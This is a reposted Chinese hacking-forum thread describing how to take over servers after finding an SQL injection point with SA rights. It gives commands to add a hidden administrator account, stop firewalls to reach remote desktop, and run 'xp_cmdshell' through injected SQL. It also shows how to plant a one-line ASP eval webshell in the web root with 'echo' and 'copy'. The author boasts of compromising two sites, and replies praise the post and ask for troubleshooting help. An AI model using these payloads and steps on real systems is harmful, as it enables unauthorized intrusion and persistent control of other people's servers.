[转帖]关于在注入时遇到SA是的一些问题
<span>关于在注入时遇到SA是的一些问题<br/>在注入中遇到SA权限是很高兴的事情,权限大嘛,呵呵!!!!不过该怎么拿下那些有SA注入点的服务器呢??这里我结合自己平时的一些经验,跟大家谈一谈,水平有限,请大家多多指教!!<br/>一 可以执行命令,而且可以连接上3389。这样相信大家都会!直接<br/> net user usernmae passwwrod /add <br/> net localgroup administrators usernmae /add<br/> 加个帐号就可以连接上去了!<br/>二 可以执行命令,但是连接不上3389。<br/> 这时我们要先来判断一下主机是否开了终端服务。<br/> 用net start看看有没有终端服务(就是这个 Terminal services)<br/> 再netstat -na 看有没有3389端口。或者是扫一下它的3389端口。<br/> 下面说各种情况:<br/> a 开了终端服务,但是没有3389端口,估计是被防火墙屏蔽了!<br/> 这时候可以浏览一下它的硬盘,看他是什么防火墙,在命令里输入net stop 防火墙的进程,然后再去连接试试,应该是可以成功的!<br/> b 没有开终端服务。我们可以用教主的开启3389功能试试!不过这样成功的几率不是很大,我试过N次,成功寥寥无几!不知道是我哪个地方漏掉了还是什么,请知道的告诉我一声!<br/> 如果还是没有成功,我们就只能想先拿个WEBSHELL来再做打算了。<br/> 下面就重点讲如何拿WEBSHELL:<br/> 1 看能不能用工具。先找网站的根目录,这个可以试试教主的读取注册表功能,还是很管用的<br/> 一般都能读出来,如果实在不行就浏览吧!尽量找什么WEB啊 WWWROOT啊 这个就看运气咯<br/> 找到目录以后,用臭要饭的getwebshell试试能不能写个一句话马进去,如果他的数据库服务器是在一台机器上的话,成功几率就大了,至少我这样成功了很多次!<br/> 如果不行,再试试用啊D或者明小子的上传功能上传一个一句话马到可以上传的目录,然后COPY命令复制到网 站的目录,这样也是可以的!<br/> 2 如果还不行,可以看看他的网站有没有什么上传的地方。比如论坛,或者是拿下他的后台上传图片木马,然后用COPY命令把它改回ASP。这样基本是没有任何问题的!我昨天还这样<br/> 拿下了两个站,呵呵!! 这是思路的一点变通,实际上基本思路还是上传,呵呵!<br/> 3 用echo命令直接写入。<br/> echo ^<^%eval request(chr(35))%^>^ >c:\tc.asp<br/> copy c:\tc.asp d:\WEB\tc.asp<br/> 这样是肯定能写入的,不过我在实验的时候发现了一些问题:就是这个%符号似乎无法正常 解析的。我用字符转换了好多次,写是能写进去,但就是不能正常解析,郁闷死了!请大家告诉我一声到底改怎么写!!先谢过了。<br/> 到这里就应该拿到WEBSHELL了,然后该怎么做我就不详细讲了!<br/> 三 不可以执行命令。<br/> 1 可以先试试用教主的恢复CMDSHELL的功能 成功几率大!<br/> 2 不行的话还可以试试用SQL命令:<br/> ;exec master..xp_cmdshell"net user usernmae passwwrod /add"-- <br/> ;exec master..xp_cmdshell"net localgroup administrators usernmae /add"-- <br/> 如果还不可以的话,呵呵,我也没有什么招了!<br/> 以上就是我在入侵是总结的一些经验,写出来和大家交流一下,见笑了。</span> 顶下 写的很详细 <p>有SA权限.也有CMDSHELL.但执行 net user usernmae passwwrod /add <br/> net localgroup administrators usernmae /add</p><p>错误.NET不能执行?要怎么办?高手指教.</p> 谢谢分享 写的很好,基本上就是这几种办法了页:
[1]